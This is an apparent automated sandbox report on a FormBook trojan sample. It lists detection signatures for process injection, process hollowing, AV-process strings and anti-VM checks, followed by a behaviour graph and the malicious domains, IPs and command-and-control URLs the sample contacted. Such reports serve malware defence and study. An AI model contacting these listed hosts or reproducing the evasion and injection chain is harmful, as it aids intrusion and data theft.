Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState VolumeInformation
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
AV process strings found (often used to terminate AV products)
Source: SearchUI.exe, 00000016.00000003.853890231.000001B8E4627000.00000004.00000001.sdmp Binary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\SUPERAntiSpyware\SUPERAntiSpyware.exe
Source: SearchUI.exe, 00000016.00000003.853890231.000001B8E4627000.00000004.00000001.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Malwarebytes Anti-Malware\mbam.exe
Source: SearchUI.exe, 00000016.00000002.913336755.000001B8D1870000.00000004.00000001.sdmp Binary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\Windows Defender\MSASCui.exe
Source: SearchUI.exe, 00000016.00000003.853890231.000001B8E4627000.00000004.00000001.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Avira\AntiVir Desktop\avcenter.exe
Source: SearchUI.exe, 00000016.00000003.853890231.000001B8E4627000.00000004.00000001.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Avira\Antivirus\avcenter.exe

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000006.00000002.1028284186.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1027686906.00000000008F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.721240186.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.721927497.0000000001090000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.686008623.0000000003DFA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1025912109.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.686170457.0000000003F66000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.722073173.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000006.00000002.1028284186.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1027686906.00000000008F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.721240186.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.721927497.0000000001090000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.686008623.0000000003DFA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1025912109.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.686170457.0000000003F66000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.722073173.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 344595 Sample: SecuriteInfo.com.Trojan.Pac... Startdate: 26/01/2021 Architecture: WINDOWS Score: 100 41 www.infomgt.net 2->41 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 Multi AV Scanner detection for submitted file 2->53 55 3 other signatures 2->55 11 SecuriteInfo.com.Trojan.Packed2.42783.14936.exe 15 4 2->11         started        15 SearchUI.exe 2->15         started        17 SearchUI.exe 2->17         started        signatures3 process4 file5 37 C:\Users\user\AppData\...\AddInProcess32.exe, PE32 11->37 dropped 39 SecuriteInfo.com.T...42783.14936.exe.log, ASCII 11->39 dropped 71 Writes to foreign memory regions 11->71 73 Allocates memory in foreign processes 11->73 75 Hides that the sample has been downloaded from the Internet (zone.identifier) 11->75 77 Injects a PE file into a foreign processes 11->77 19 AddInProcess32.exe 11->19         started        signatures6 process7 signatures8 57 Modifies the context of a thread in another process (thread injection) 19->57 59 Maps a DLL or memory area into another process 19->59 61 Sample uses process hollowing technique 19->61 63 2 other signatures 19->63 22 explorer.exe 19->22 injected process9 process10 24 mstsc.exe 22->24         started        27 WerFault.exe 17 9 22->27         started        signatures11 65 Modifies the context of a thread in another process (thread injection) 24->65 67 Maps a DLL or memory area into another process 24->67 69 Tries to detect virtualization through RDTSC time measurements 24->69 29 explorer.exe 1 186 24->29         started        33 cmd.exe 1 24->33         started        process12 dnsIp13 43 g2vies.com 34.102.136.180, 49775, 49777, 80 GOOGLEUS United States 29->43 45 www.thesunchronical.com 29->45 47 5 other IPs or domains 29->47 79 System process connects to network (likely due to code injection or exploit) 29->79 35 conhost.exe 33->35         started        signatures14 process15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
34.102.136.180
 unknown United States
15169 GOOGLEUS true

Private
IP
192.168.2.1

Contacted Domains

Name IP Active
edu4go.com 34.102.136.180 true
www.infomgt.net 188.166.214.231 true
g2vies.com 34.102.136.180 true
www.g2vies.com unknown unknown
www.edu4go.com unknown unknown
www.serenityhomedits.com unknown unknown
www.thesunchronical.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.edu4go.com/bsl/?mt=meRO04KZ+tRueejEQ1mKApUC+xiZQAGZPTeO6WstMPZoEBgumINoRWRpGBFK3WkMjtLu&2d=hxlpdRkxCvtTgBzP true
  • Avira URL Cloud: safe
 unknown
http://www.g2vies.com/bsl/?2d=hxlpdRkxCvtTgBzP&mt=B72SzM4OK6YheLE+tS6SAH+1fBRAvDBThfWED1RPUqC7thw4cowf+3ukjA/mpLG53kNi true
  • Avira URL Cloud: safe
 unknown